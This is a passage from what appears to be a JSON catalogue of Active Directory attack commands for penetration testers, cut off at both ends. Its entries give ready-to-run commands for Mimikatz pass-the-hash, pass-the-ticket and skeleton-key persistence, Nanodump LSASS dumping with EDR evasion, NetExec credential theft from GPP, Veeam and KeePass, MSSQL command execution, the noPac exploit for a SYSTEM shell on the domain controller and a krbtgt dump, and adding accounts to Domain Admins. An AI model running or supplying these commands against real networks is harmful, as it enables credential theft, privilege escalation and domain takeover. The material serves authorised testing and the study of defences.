/run:cmd.exe\" exit","description":"Mimikatz sekurlsa::pth performs pass-the-hash by starting a new process whose logon session is seeded with a supplied NT hash (or AES key), letting network authentication proceed as the target user without knowing their password. The spawned process (here cmd.exe) can then reach SMB, WMI, or WinRM as john. It requires local administrator rights on the box you run it from because it patches the new process's LSASS session; use /aes256 instead of /ntlm for an overpass-the-hash that requests Kerberos tickets.\n\nCommand Reference:\n\n\tUsername: john\n\n\tDomain: test.local\n\n\tNT hash: 2a3de7fe356ee524cc9f3d579f2e0aa7","mitre":["T1550.002"],"requires":["Shell","NTLM hash"],"services":["NTLM","SMB","Kerberos"],"references":["https://github.com/gentilkiwi/mimikatz","https://book.hacktricks.xyz/windows-hardening/ntlm/pass-the-hash","https://attack.mitre.org/techniques/T1550/002/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Mimikatz-PassTheTicket","toolId":"wadcoms:Mimikatz","toolName":"Mimikatz","name":"Mimikatz-PassTheTicket","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Lateral Movement"],"nativeCategory":["Lateral Movement"],"command":"mimikatz.exe \"kerberos::ptt ticket.kirbi\" exit","description":"Mimikatz kerberos::ptt injects a Kerberos ticket (.kirbi TGT or TGS) directly into the current logon session's ticket cache, so subsequent tools authenticate with it transparently. Unlike sekurlsa::pth it does not spawn a process or need administrator rights, since it only writes to the caller's own cache. Use it to replay a harvested or forged ticket for pass-the-ticket lateral movement, then verify with klist.\n\nCommand Reference:\n\n\tTicket file: ticket.kirbi","mitre":["T1550.003"],"requires":["Shell","Kerberos ticket"],"services":["Kerberos"],"references":["https://github.com/gentilkiwi/mimikatz","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/pass-the-ticket","https://attack.mitre.org/techniques/T1550/003/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Mimikatz-SkeletonKey","toolId":"wadcoms:Mimikatz","toolName":"Mimikatz","name":"Mimikatz-SkeletonKey","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Persistence"],"nativeCategory":["Persistence"],"command":"mimikatz.exe \"privilege::debug\" \"misc::skeleton\" exit","description":"Mimikatz misc::skeleton patches the LSASS process of a live domain controller in memory so that a master password (the hardcoded default 'mimikatz') is accepted for any domain account alongside each user's real password. It is a stealthy but volatile persistence primitive: the patch lives only in memory and is lost on DC reboot, and it downgrades some Kerberos encryption which detections watch for. It requires Domain Admin / SeDebugPrivilege on the DC and only works against DCs not running LSA as a protected process.\n\nCommand Reference:\n\n\tTarget: Domain Controller DC01 (dc.test.local)\n\n\tMaster password: mimikatz (built-in default)","mitre":["T1556.001"],"requires":["Shell"],"services":["Kerberos"],"references":["https://github.com/gentilkiwi/mimikatz","https://adsecurity.org/?p=1275","https://attack.mitre.org/techniques/T1556/001/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Nanodump-LSASS","toolId":"wadcoms:Nanodump","toolName":"Nanodump","name":"Nanodump-LSASS","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access","Defense Evasion"],"nativeCategory":["Credential Access","Defense Evasion"],"command":"nanodump.x64.exe --fork --valid --write C:\\Windows\\Temp\\lsass.dmp","description":"Nanodump is an OPSEC-aware LSASS dumper that reads process memory and writes a minidump without calling the heavily monitored MiniDumpWriteDump API, avoiding many EDR hooks. --fork clones the LSASS process and dumps the copy to reduce detection, and --valid restores the dump's signature so pypykatz or Mimikatz can parse it (nanodump writes an invalid signature by default to evade disk scanners). It requires local administrator / SeDebugPrivilege; exfil the dump and parse it offline.\n\nCommand Reference:\n\n\tOutput dump: C:\\Windows\\Temp\\lsass.dmp","mitre":["T1003.001"],"requires":["Shell"],"services":["NTLM","Kerberos"],"references":["https://github.com/fortra/nanodump","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1003/001/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:NetExec-LDAP-ADCS","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-LDAP-ADCS","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration","Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"# Enumerate Enterprise CAs and certificate templates over LDAP\nnxc ldap 10.10.10.1 -u john -p password123 -M adcs","description":"The NetExec (nxc) ldap module -M adcs enumerates Active Directory Certificate Services by querying the Configuration partition over LDAP, listing the Enterprise CAs and the certificate templates published in the domain. It is a quick way to confirm AD CS is present and to gather CA and template names before running Certipy to hunt for vulnerable (ESC) configurations. Requires any valid domain account.\n\nCommand Reference:\n\n\tUsername: john\n\tPassword: password123\n\tTarget DC IP: 10.10.10.1","mitre":[],"requires":["Username","Password"],"services":["LDAP","ADCS"],"references":["https://github.com/Pennyw0rth/NetExec","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates","https://posts.specterops.io/certified-pre-owned-d95910965cd2"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:NetExec-LDAP-MAQ","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-LDAP-MAQ","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration","Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"# Read ms-DS-MachineAccountQuota (how many computer accounts this user may add)\nnxc ldap 10.10.10.1 -u john -p password123 -M maq\n# Confirm the authenticated identity / domain SID\nnxc ldap 10.10.10.1 -u john -p password123 -M whoami","description":"The NetExec (nxc) ldap module -M maq reads the ms-DS-MachineAccountQuota attribute, revealing how many computer accounts an authenticated user is allowed to create (default 10). A non-zero quota is a prerequisite for attacks that need a controlled computer object, such as Resource-Based Constrained Delegation (RBCD) and Shadow Credentials. The -M whoami module confirms the authenticated context and domain SID. Both need only a valid low-privileged account.\n\nCommand Reference:\n\n\tUsername: john\n\tPassword: password123\n\tTarget DC IP: 10.10.10.1","mitre":["T1087.002"],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/ldap-protocol/enumerate-machineaccountquota","https://attack.mitre.org/techniques/T1087/002/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:NetExec-MSSQL-CmdExec","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-MSSQL-CmdExec","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution","Lateral Movement"],"nativeCategory":["Exploitation","Lateral Movement"],"command":"# OS command via xp_cmdshell\nnxc mssql 10.10.10.1 -u john -p password123 -x \"whoami /all\"\n\n# PowerShell command\nnxc mssql 10.10.10.1 -u john -p password123 -X \"$PSVersionTable\"","description":"NetExec's mssql -x runs an operating-system command through xp_cmdshell (it will enable the option automatically if the login is sysadmin), returning stdout. Use -X instead to execute a PowerShell command block. Command execution runs as the SQL Server service account and requires sysadmin; enabling xp_cmdshell is a high-signal event.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["MSSQL"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/mssql-protocol/command-execution","https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:NetExec-MSSQL-LocalAuth","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-MSSQL-LocalAuth","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access","Lateral Movement"],"nativeCategory":["Credential Access","Lateral Movement"],"command":"# Local SQL login (e.g. sa) rather than domain auth\nnxc mssql 10.10.10.1 -u sa -p password123 --local-auth\n\n# Spray a local sa password across a subnet\nnxc mssql 10.10.10.0/24 -u sa -p password123 --local-auth","description":"With --local-auth, NetExec authenticates the SQL Server login as a local (mixed-mode) account instead of a domain principal — the classic case being the sa account or a recovered application login. This is useful for password spraying a reused sa password across many hosts, or logging into an instance that is not domain-joined. Combine with -q, -x, or a module once authenticated.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: sa\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["MSSQL"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/mssql-protocol/authentication","https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:NetExec-MSSQL-Priv","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-MSSQL-Priv","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# Enumerate impersonation / db_owner privesc paths\nnxc mssql 10.10.10.1 -u john -p password123 -M mssql_priv\n\n# Escalate the current login to sysadmin\nnxc mssql 10.10.10.1 -u john -p password123 -M mssql_priv -o ACTION=privesc","description":"The mssql_priv NetExec module enumerates and abuses privilege-escalation paths inside a SQL Server instance — principals the login can impersonate (EXECUTE AS / IMPERSONATE), and db_owner membership on databases owned by a high-privileged principal. Run it with no options to enumerate available paths; run it with ACTION=privesc to walk the chain and grant the current login sysadmin. Add ACTION=rollback to undo the change afterwards.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["MSSQL"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/mssql-protocol/mssql-privesc","https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:NetExec-MSSQL-Query","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-MSSQL-Query","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration","Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"nxc mssql 10.10.10.1 -u john -p password123 -q \"SELECT @@version\"\n\n# domain (Windows) auth\nnxc mssql 10.10.10.1 -u john -p password123 --windows-auth -q \"SELECT SYSTEM_USER\"","description":"NetExec's mssql protocol authenticates to SQL Server and runs an arbitrary T-SQL statement with -q/--query, printing the result set. It is the quickest way to fingerprint an instance (@@version), enumerate databases, or check the effective privileges of the login. Add -windows-auth to authenticate the domain account over NTLM rather than SQL auth.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["MSSQL"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/mssql-protocol/authentication","https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:NetExec-noPac","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec nopac Module","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"nxc smb 10.10.10.1 -u john -p password123 -M nopac","description":"The NetExec/nxc smb 'nopac' module automates the CVE-2021-42278 + CVE-2021-42287 sAMAccountName spoofing chain from a single authenticated SMB connection. It confirms the DC is vulnerable, creates and renames a machine account, and requests an impersonating service ticket, saving the resulting ccache to disk for reuse with impacket tools. Requires MachineAccountQuota > 0 and a DC missing the November 2021 patches; it is a fast way to validate the primitive during an engagement.\n\nCommand Reference:\n\n\tDomain / DC IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["SMB","Kerberos","LDAP"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:NetExec-SMB-GPPAutologin","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-SMB-GPPAutologin","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access","Collection"],"nativeCategory":["Credential Access","Collection"],"command":"nxc smb 10.10.10.1 -u john -p password123 -M gpp_autologin","description":"The gpp_autologin module parses Registry.xml files pushed through Group Policy Preferences in SYSVOL and extracts autologon credentials (DefaultUserName / DefaultPassword) configured for interactive logon. Unlike cpassword these values are stored in cleartext, so no decryption is needed. Any domain account can read SYSVOL, making this a fast credential-hunting check against the domain controller alongside gpp_password.\n\nCommand Reference:\n\n\tDC IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123","mitre":["T1552.006"],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/smb-protocol/obtaining-credentials/gpp-password","https://attack.mitre.org/techniques/T1552/006/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:NetExec-SMB-GPPPassword","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-SMB-GPPPassword","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access","Collection"],"nativeCategory":["Credential Access","Collection"],"command":"nxc smb 10.10.10.1 -u john -p password123 -M gpp_password","description":"The gpp_password module searches SYSVOL for Group Policy Preferences XML files (Groups.xml, Services.xml, ScheduledTasks.xml, etc.) that contain a cpassword attribute, then decrypts it using the AES key Microsoft published in MSDN. Any authenticated domain user can read SYSVOL, so this is a classic quick win for recovering local admin or service account passwords set via GPP. Microsoft patched (MS14-025) the ability to create new GPP passwords but did not remove existing ones, so legacy cpassword values still linger in many domains.\n\nCommand Reference:\n\n\tDC IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123","mitre":["T1552.006"],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/smb-protocol/obtaining-credentials/gpp-password","https://attack.mitre.org/techniques/T1552/006/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:NetExec-SMB-KeePassDiscover","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-SMB-KeePassDiscover","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery","Credential Access"],"nativeCategory":["Discovery","Credential Access"],"command":"nxc smb 10.10.10.1 -u john -p password123 -M keepass_discover","description":"The keepass_discover module remotely enumerates a target for running KeePass processes and for KeePass.config.xml configuration files, reporting the paths it finds. This is the reconnaissance step before keepass_trigger: you need the config file path to plant a malicious export trigger. Requires local admin on the target so the module can inspect processes and the user's AppData. No database is opened or modified at this stage.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/smb-protocol/obtaining-credentials/dump-keepass"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:NetExec-SMB-KeePassTrigger","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-SMB-KeePassTrigger","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access","Collection"],"nativeCategory":["Credential Access","Collection"],"command":"nxc smb 10.10.10.1 -u john -p password123 -M keepass_trigger -o KEEPASS_CONFIG_PATH=\"C:\\Users\\john\\AppData\\Roaming\\KeePass\\KeePass.config.xml\"","description":"The keepass_trigger module abuses KeePass's trigger system: it edits KeePass.config.xml (path found via keepass_discover) to add a malicious export trigger, so the next time the victim unlocks their database KeePass silently exports every entry in cleartext to a location the operator can read. The default ACTION=ALL adds the trigger, waits, retrieves and parses the export, then cleans up. Requires local admin on the host and that the user actually opens their vault; it is noisier and higher-risk than passive hunting, so restore the config afterward.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123\n\n\tKeePass config path: C:\\Users\\john\\AppData\\Roaming\\KeePass\\KeePass.config.xml","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/smb-protocol/obtaining-credentials/dump-keepass"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:NetExec-SMB-SpiderPlus","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-SMB-SpiderPlus","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Collection","Discovery"],"nativeCategory":["Collection","Discovery"],"command":"# JSON share/file inventory only (metadata, no downloads)\nnxc smb 10.10.10.1 -u john -p password123 -M spider_plus\n\n# Download every readable file under the size limit\nnxc smb 10.10.10.1 -u john -p password123 -M spider_plus -o DOWNLOAD_FLAG=True","description":"The spider_plus module walks every share the authenticated user can read and writes a per-host JSON inventory of file metadata (path, size, ctime/mtime/atime) to the output folder, giving you a fast triage map of what exists before you pull anything down. By default it only catalogs; setting DOWNLOAD_FLAG=True makes it copy files under MAX_FILE_SIZE to the loot folder. Prefer the metadata-only run first to stay quiet and avoid mass file reads. Good starting point for share enumeration at scale with a single low-priv credential.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/smb-protocol/spidering-shares"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:NetExec-SMB-Veeam","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-SMB-Veeam","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access","Collection"],"nativeCategory":["Credential Access","Collection"],"command":"nxc smb 10.10.10.1 -u john -p password123 -M veeam","description":"The veeam module locates a Veeam Backup & Replication configuration database on the target, reads the stored credential records and decrypts them, recovering the accounts Veeam uses for backups (often domain or local admin). Because backup servers are commonly configured with highly privileged service accounts, this is a frequent path to escalation. Requires local admin on the Veeam server so the module can reach the backing SQL database and DPAPI material.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/smb-protocol/obtaining-credentials/veeam"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Nltest-DomainTrusts-Discovery","toolId":"wadcoms:Nltest","toolName":"Nltest","name":"Nltest-DomainTrusts-Discovery","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Discovery","Enumeration"],"nativeCategory":["Discovery","Enumeration"],"command":"# List all trust relationships in the forest\nnltest /domain_trusts /all_trusts\n# Enumerate domain controllers for the domain\nnltest /dclist:test.local","description":"nltest.exe is a signed Windows built-in (living-off-the-land) used to map trust relationships and locate domain controllers from an existing foothold, with no third-party tooling dropped to disk. /domain_trusts /all_trusts lists every trust relationship in the forest, and /dclist:<domain> enumerates the DCs for a domain - both useful for planning cross-domain and cross-forest movement. It runs in the current user's context on any domain-joined host.\n\nCommand Reference:\n\n\tDomain: test.local","mitre":["T1482"],"requires":["Shell"],"services":["LDAP","Kerberos"],"references":["https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)","https://attack.mitre.org/techniques/T1482/","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:noPac-SAMSpoof","toolId":"wadcoms:noPac","toolName":"noPac","name":"noPac (CVE-2021-42278 + CVE-2021-42287)","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution","Credential Access"],"nativeCategory":["PrivEsc","Exploitation","Credential Access"],"command":"# Interactive SYSTEM shell on the DC\npython3 noPac.py test.local/john:password123 -dc-ip 10.10.10.1 -dc-host DC01 --impersonate administrator -use-ldap -shell\n\n# Dump the krbtgt hash via secretsdump\npython3 noPac.py test.local/john:password123 -dc-ip 10.10.10.1 -dc-host DC01 --impersonate administrator -use-ldap -dump -just-dc-user krbtgt","description":"noPac.py (Ridter) chains CVE-2021-42278 (sAMAccountName spoofing) and CVE-2021-42287 (KDC PAC confusion) to escalate from a low-privileged domain user to SYSTEM on the Domain Controller. It adds a new machine account, renames its sAMAccountName to match the DC (dropping the trailing $), requests a TGT, restores the name, then performs S4U2self to obtain a service ticket impersonating a Domain Admin. Requires MachineAccountQuota > 0 (default 10) and a DC unpatched against the November 2021 fixes. Use -shell for an interactive SYSTEM shell via smbexec or -dump to run secretsdump against the DC.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDC IP: 10.10.10.1\n\n\tDC host: DC01\n\n\tImpersonate: administrator","mitre":[],"requires":["Username","Password"],"services":["Kerberos","SMB","LDAP"],"references":["https://github.com/Ridter/noPac","https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:noPac-Scanner","toolId":"wadcoms:noPac","toolName":"noPac","name":"noPac Vulnerability Scanner","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration","Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"python3 scanner.py test.local/john:password123 -dc-ip 10.10.10.1 -use-ldap","description":"scanner.py ships with Ridter's noPac and safely checks whether a Domain Controller is exploitable via the sAMAccountName spoofing chain without adding or renaming any accounts. It authenticates as a normal domain user and reports the current MachineAccountQuota and whether the DC is patched against CVE-2021-42278 / CVE-2021-42287. Run it first as a low-noise reconnaissance step before launching the full noPac.py exploit.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDC IP: 10.10.10.1","mitre":[],"requires":["Username","Password"],"services":["Kerberos","LDAP","SMB"],"references":["https://github.com/Ridter/noPac","https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:PowerMad-NewMachineAccount","toolId":"wadcoms:PowerMad","toolName":"PowerMad","name":"PowerMad-NewMachineAccount","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["Exploitation","PrivEsc"],"command":"# Import Powermad and create a new machine account\nImport-Module .\\Powermad.ps1\nNew-MachineAccount -MachineAccount EVILPC -Password $(ConvertTo-SecureString 'password123' -AsPlainText -Force)","description":"Powermad's New-MachineAccount cmdlet creates a new computer account in the domain over LDAP/SAMR from a Windows foothold, abusing the default ms-DS-MachineAccountQuota (10) that lets any authenticated user add machine accounts. The resulting account, with a password you supply, is the controlled principal for RBCD and shadow-credential chains carried out with SharpAllowedToAct or Rubeus. Run it in-session as any domain user; verify the quota is non-zero first.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tNew machine account: EVILPC\n\n\tPassword: password123","mitre":[],"requires":["PowerShell","Shell"],"services":["LDAP"],"references":["https://github.com/Kevin-Robertson/Powermad","https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/resource-based-constrained-delegation"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:PowerUpSQL-Get-SQLServerLinkCrawl","toolId":"wadcoms:PowerUpSQL","toolName":"PowerUpSQL","name":"PowerUpSQL-Get-SQLServerLinkCrawl","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Lateral Movement"],"nativeCategory":["PrivEsc","Lateral Movement"],"command":"Import-Module .\\PowerUpSQL.ps1\n\n# Crawl all linked servers from the starting instance\nGet-SQLServerLinkCrawl -Verbose -Instance 10.10.10.1 -Query \"SELECT SYSTEM_USER, IS_SRVROLEMEMBER('sysadmin')\"\n\n# Run an OS command on any node that allows it\nGet-SQLServerLinkCrawl -Verbose -Instance 10.10.10.1 -Query \"exec master..xp_cmdshell 'whoami'\"","description":"Get-SQLServerLinkCrawl recursively follows linked-server definitions from a starting instance, executing a query at every hop via OPENQUERY chains. Because linked servers frequently run under a higher-privileged (often sysadmin) mapped login on the remote side, crawling the graph commonly yields privilege escalation or lateral movement to instances the operator could not reach directly. Supply -Query to fingerprint each node, or drive command execution through xp_cmdshell across the chain.\n\nCommand Reference:\n\n\tTarget instance: 10.10.10.1","mitre":[],"requires":["PowerShell"],"services":["MSSQL"],"references":["https://github.com/NetSPI/PowerUpSQL","https://www.netspi.com/blog/technical-blog/network-penetration-testing/how-to-hack-database-links-in-sql-server/","https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:PowerUpSQL-GetSQLInstanceDomain","toolId":"wadcoms:PowerUpSQL","toolName":"PowerUpSQL","name":"PowerUpSQL-GetSQLInstanceDomain","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Discovery","Enumeration"],"nativeCategory":["Discovery","Enumeration"],"command":"Import-Module .\\PowerUpSQL.ps1\n\n# Discover SQL Server instances from SPNs in the domain\nGet-SQLInstanceDomain\n\n# Then test which ones accept the current user\nGet-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose","description":"Get-SQLInstanceDomain queries the domain via LDAP for Service Principal Names beginning with MSSQL*, revealing every registered SQL Server instance and the account it runs as without touching a single database. It is the standard domain-wide MSSQL discovery step and runs under the current user's context from a domain-joined foothold. Pipe the results into Get-SQLConnectionTestThreaded to find which instances your account can actually log into.\n\nCommand Reference:\n\n\tDomain: test.local","mitre":[],"requires":["PowerShell"],"services":["MSSQL","LDAP"],"references":["https://github.com/NetSPI/PowerUpSQL","https://www.netspi.com/blog/technical-blog/network-penetration-testing/finding-sensitive-data-domain-sql-servers-powerupsql/","https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:PowerUpSQL-Invoke-SQLAudit","toolId":"wadcoms:PowerUpSQL","toolName":"PowerUpSQL","name":"PowerUpSQL-Invoke-SQLAudit","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"Import-Module .\\PowerUpSQL.ps1\n\n# Audit an instance for privesc issues\nInvoke-SQLAudit -Verbose -Instance 10.10.10.1\n\n# Execute an OS command through the instance\nInvoke-SQLOSCmd -Verbose -Instance 10.10.10.1 -Command \"whoami\"","description":"Invoke-SQLAudit runs PowerUpSQL's battery of privilege-escalation checks against an instance and reports exploitable misconfigurations (impersonation, trustworthy databases, agent jobs, etc.). Where the login already has the rights, Invoke-SQLOSCmd executes an operating-system command through the instance (using xp_cmdshell), returning output. Both take -Instance in HOST\\INSTANCE or HOST,PORT form and use integrated auth by default.\n\nCommand Reference:\n\n\tTarget instance: 10.10.10.1","mitre":[],"requires":["PowerShell"],"services":["MSSQL"],"references":["https://github.com/NetSPI/PowerUpSQL","https://www.netspi.com/blog/technical-blog/network-penetration-testing/establishing-registry-persistence-via-sql-server-powerupsql/","https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:PowerView-AddDomainGroupMember-DA","toolId":"wadcoms:PowerView","toolName":"PowerView","name":"PowerView-AddDomainGroupMember-DA","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Persistence"],"nativeCategory":["PrivEsc","Persistence"],"command":"Import-Module .\\PowerView.ps1\nAdd-DomainGroupMember -Identity 'Domain Admins' -Members john -Verbose\n# Verify\nGet-DomainGroupMember -Identity 'Domain Admins' | select MemberName","description":"Add-DomainGroupMember adds a principal to a group over LDAP, and when you hold write access to the membership of a privileged group (for example via an abusable GenericAll/WriteMembers ACE) this promotes a controlled account straight into Domain Admins. This is a loud, high-impact change that should be reverted with Remove-DomainGroupMember after the objective; it is often paired with -Credential to act as the principal that actually holds the right.\n\nCommand Reference:\n\n\tUsername: john\n\n\tTarget group: Domain Admins","mitre":[],"requires":["PowerShell"],"services":["LDAP"],"references":["https://github.com/PowerShellMafia/PowerSploit","https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993","https://www.thehacker.recipes/ad/movement/dacl/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed 